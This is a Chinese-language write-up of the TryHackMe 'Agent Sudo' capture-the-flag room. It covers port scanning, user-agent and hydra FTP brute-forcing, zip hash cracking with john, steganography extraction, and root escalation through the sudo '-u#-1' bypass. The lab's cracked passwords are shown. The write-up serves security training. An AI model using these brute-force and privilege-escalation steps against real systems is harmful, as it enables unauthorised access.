[THM] Agent Sudo

枚举

端口开放

nmap -sV -sC -v -Pn 10.49.189.131 

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA)
|   256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA)
|_  256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Annoucement
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

进入隐藏页面

提示使用代号作为ua头才可以进入

这里参考R,猜测其他代号也是大写字母这些,这里抓包爆破UA头部,可以看到C的时候是302的跳转

使用C的ua头进入,发现用户名是chris

Hash爆破

FTP服务探测

匿名登录无法实现,那么只能使用先前拿到的chris进行尝试爆破密码,能不能登录进去

hydra爆破出密码是crystal

ftp登录之后可以找到三个文件,使用get下载到本地

ftp 10.49.189.131
Connected to 10.49.189.131.
220 (vsFTPd 3.0.3)
Name (10.49.189.131:kali): chris

331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||27560|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0             217 Oct 29  2019 To_agentJ.txt
-rw-r--r--    1 0        0           33143 Oct 29  2019 cute-alien.jpg
-rw-r--r--    1 0        0           34842 Oct 29  2019 cutie.png
226 Directory send OK.
ftp> get To_agentJ.txt
local: To_agentJ.txt remote: To_agentJ.txt
229 Entering Extended Passive Mode (|||62279|)
150 Opening BINARY mode data connection for To_agentJ.txt (217 bytes).
100% |***********************************************************************************************************************************************************************|   217      103.42 KiB/s    00:00 ETA
226 Transfer complete.
217 bytes received in 00:00 (0.92 KiB/s)
ftp> get cut
cute-alien.jpg	cutie.png
ftp> get cute-alien.jpg
local: cute-alien.jpg remote: cute-alien.jpg
229 Entering Extended Passive Mode (|||19041|)
150 Opening BINARY mode data connection for cute-alien.jpg (33143 bytes).
100% |***********************************************************************************************************************************************************************| 33143       69.82 KiB/s    00:00 ETA
226 Transfer complete.
33143 bytes received in 00:00 (47.27 KiB/s)
ftp> get  cutie.png
local: cutie.png remote: cutie.png
229 Entering Extended Passive Mode (|||40413|)
150 Opening BINARY mode data connection for cutie.png (34842 bytes).
100% |***********************************************************************************************************************************************************************| 34842       75.59 KiB/s    00:00 ETA
226 Transfer complete.
34842 bytes received in 00:00 (50.50 KiB/s)
ftp> exit
221 Goodbye.

图片隐写

猜测在图片中包含了其他文件,使用binwalk进行分析

binwalk cute-alien.jpg 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01

binwalk cutie.png 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PNG image, 528 x 528, 8-bit colormap, non-interlaced
869           0x365           Zlib compressed data, best compression
34562         0x8702          Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
34820         0x8804          End of Zip archive, footer length: 22

发现cutie.png中存在一个zip压缩包,使用命令binwalk -e cutie.png提取其中的压缩包

使用unzip提示版本太高,使用7z x 8702.zip尝试解压,提示有密码,使用john进行破解

zip2john 8702.zip > zip_hash.txt

john zip_hash.txt 
 
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 128/128 AVX 4x])
Cost 1 (HMAC size) is 78 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
alien            (8702.zip/To_agentR.txt)     
1g 0:00:00:00 DONE 2/3 (2026-03-29 22:27) 1.234g/s 54869p/s 54869c/s 54869C/s 123456..Peter
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

文件夹中就一个txt

Agent C,

We need to send the picture to 'QXJlYTUx' as soon as possible!

By,
Agent R

QXJlYTUx感觉像是编码,去Cyber尝试解密,破解出来Area51

对于另一张图片,使用steghide发现其中存在隐藏的信息,不过需要密码,尝试上面拿到的Area51正好破解出结果

也可以使用工具直接破解

stegseek cute-alien.jpg /usr/share/wordlists/rockyou.txt 
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "Area51"          
[i] Original filename: "message.txt".
[i] Extracting to "cute-alien.jpg.out".

破解出的文件中给了一个账户以及密码

cat cute-alien.jpg.out
Hi james,

Glad you find this message. Your login password is hackerrules!

Don't ask me why the password look cheesy, ask agent R who set this password for you.

Your buddy,
chris

获取user

同时在目录下找到一个jpg图片,使用scp传输到我们的电脑中

使用谷歌的图片搜索,或者其他的反向查找工具,找到图片名是Roswell alien autopsy

权限提升

sudo -l

[sudo] password for james: 
Matching Defaults entries for james on agent-sudo:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on agent-sudo:
    (ALL, !root) /bin/bash

发现(ALL, !root) /bin/bash这个的sudo设置很奇怪,用户可以使用sudo命令,不过是以除了root以外的任意身份执行命令

谷歌搜索一下,找到一个相关的cve漏洞,这个漏洞对于sudo版本低于1.8.27才可以利用

sudo -u#-1可以提权到root,拿到root的flag

最后的附加题可以在这个文件的最后看到是DesKel就是Agent R

1 2	`By, DesKel a.k.a Agent R`

总结

密码破解,图片steghide隐藏以及binwalk提取其中的zip
hydra的ftp爆破
利用sudo的现成cve漏洞进行权限提升